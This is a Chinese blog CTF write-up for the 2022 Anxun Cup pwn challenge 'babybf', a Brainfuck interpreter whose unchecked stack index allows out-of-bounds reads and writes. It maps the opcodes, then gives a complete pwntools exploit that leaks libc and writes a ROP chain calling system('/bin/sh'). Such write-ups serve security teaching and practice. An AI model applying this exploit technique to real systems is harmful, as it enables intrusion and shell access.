2022安洵杯babybf

最新推荐文章于 2024-09-06 08:41:31 发布
最新推荐文章于 2024-09-06 08:41:31 发布
阅读量461 收藏
点赞数 1
分类专栏: PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/128118624
版权

babybf

赛后分析了下,发现是一道很有意思的题目

Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。

其实本题是一个c语言实现的Brainfuck语言的解释器,就是让我们输入Brainfuck语言去pwn

分析:

当然我们一开始啥都不知道,ida打开程序,主要分析这里的数组
请添加图片描述

这里把我们输入的code当作数组的下标进去转换

我们看这个数组是啥东西
请添加图片描述

我们要转换到这些00~08的值的话就要送一些特定的字符

其实这里相当于对应选项v4[0~8],去执行一些命令

请添加图片描述

我们计算一下地址可以得到对应的字符

例:0:(0x2110-0x2020)/4=0x3c=“<”

总结可得:

0:\x3c -->"<"
1:\x3e -->">"
2:\x2b -->"+"
3:\x2d -->"-"
4:\x2e -->"."
5:\x2c -->","
6:\x5b -->"["
7:\x5d -->"]"
8:\x00

这其实就是Brainfuck语言的字符标识

Brainfuck程序可以用下面的替换方法翻译成C语言(这题ptr是在栈上):

BrainfuckC
>++ptr;
<–ptr;
+++*ptr;
-–*ptr;
.putchar(*ptr);
,*ptr =getch();
[while (*ptr) {
]}

利用:

这题漏洞在数组越界,没对下标做检查

我们通过调试可得初始位置ptr在0x7fffe0c1eb60

请添加图片描述

在栈上的固定偏移如下

请添加图片描述

接下来就好做了,(偏移0x20)泄露libc,(偏移0x38)写rop到ret处执行system(“/bin/sh”)

Exp:

from pwn import * 
local_file  = './chall'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
elif select == 1:
    r = remote('node4.buuoj.cn',25904 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, b'\0'))
uu64    = lambda data               :u64(data.ljust(8, b'\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
#-----------------------------
def debug(cmd=''):
     gdb.attach(r,cmd)
     pause()
def cmd(content):
    sla("len> ",str(len(content)))
    sea("code> ",content)
#------------------------
#debug()
cmd(">"*0x20+".>.>.>.>.>.")
libc_base=uu64(ru("\x7f")[-6:])-0x401B40
info("libc_base",libc_base)
pop_rdi = libc_base + next(libc.search(asm('pop rdi\nret')))
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search("/bin/sh").next()
ret = libc_base + next(libc.search(asm('ret')))

payload=flat(ret,pop_rdi,binsh,system)
print(len(payload))
cmd(">"*0x38+",>"*(len(payload)-1)+',')
r.send(payload)

r.interactive()
Nq0inaen
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
arm pwn 学习--安洵2022 pwn babyarm
FUCKING12的博客
12-03 559
此题绕过一个魔改的base64后就是一个简单的栈溢出, 然后是arm架构ret2libc怎么利用,这里可以总结出一个模板: 这是init函数里的一段gadget 通过以上的gadget利用就可以得到shell。 首先是要泄露libc里面的地址: 先往r7里输入puts的got表地址,然后会mov给r0,r0里的内容是函数的第一个参数,然后会调到r3去执行,我们也可以控制r3,往r3里面输入puts的plt表地址,执行puts(puts_got)来得到地址。 得到地址后,继续重复以上类似的操作,执行sy
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3210
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2755
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1815
做arm架构下的pwn题某个报错
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1802
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn。
house of cat 学习
m0_51251108的博客
10-13 1209
house of cat的利用链学习
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1168
CISCN2021pwn pwny(数组越界,劫持exit_hook)
用patchelf改程序后在exp中用gdb.attach()调试堆栈
m0_51251108的博客
09-28 1106
用patchelf改程序后在exp中用gdb.attach()调试堆栈
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1069
浙江省第五届大学生网络与信息安全竞赛预赛pwn
ctf比赛文件下载网站
m0_51251108的博客
10-03 1058
ctf比赛文件下载
[2020 新春红包题]3(libc2.29 tcache tashing unlink )
m0_51251108的博客
09-29 1046
libc2.29 tcache tashing unlink
how2heap2.31学习(2)
m0_51251108的博客
10-01 1033
how2heaplibc2.31的house部分
gyctf_2020_document(uaf)
m0_51251108的博客
11-14 998
gyctf_2020_document: 保护全开 漏洞分析: delete函数里指针未清零 大致思路: 这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符 1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00 (这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc 2.我们接下来的目的是控制申请
hitcon_ctf_2019_one_punch(libc2.29 tcache tashing unlink)
m0_51251108的博客
09-30 957
libc2.29 tcache tashing unlink
NewStarCTFWEEK1部分题解
m0_51251108的博客
09-26 940
NewStarCTFWEEK1
qctf2018_stack2(数组越界,偏移寻找)
m0_51251108的博客
11-12 754
qctf2018_stack2: 程序分析: 漏洞出现在change这里,没有对v5作边界检查,我们能造成越界,直接读数到ret地址 后门函数: 两个小trick: 1.我们都会以为偏移是0x70+4,而实际却是0x84 跟着这位师傅的文章调试: https://zhuanlan.zhihu.com/p/301091515 首先ida找到首次出现v13的地方,可以看到在for循环里 我们接着看这部分的Text view 断点下在0x80486ae,得到v13真实地址为0xffffd028 继续调
【盖世汽车-注册安全分析报告】
09-02 1352
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
网络安全宗旨和目标
网络研究观
09-02 672
网络安全涉及网络和相关数据及信息的保护与保障。它已从物理技术发展到防病毒和反网络钓鱼平台等软件方法。
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
最新发布
文件数据安全交换
09-06 660
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值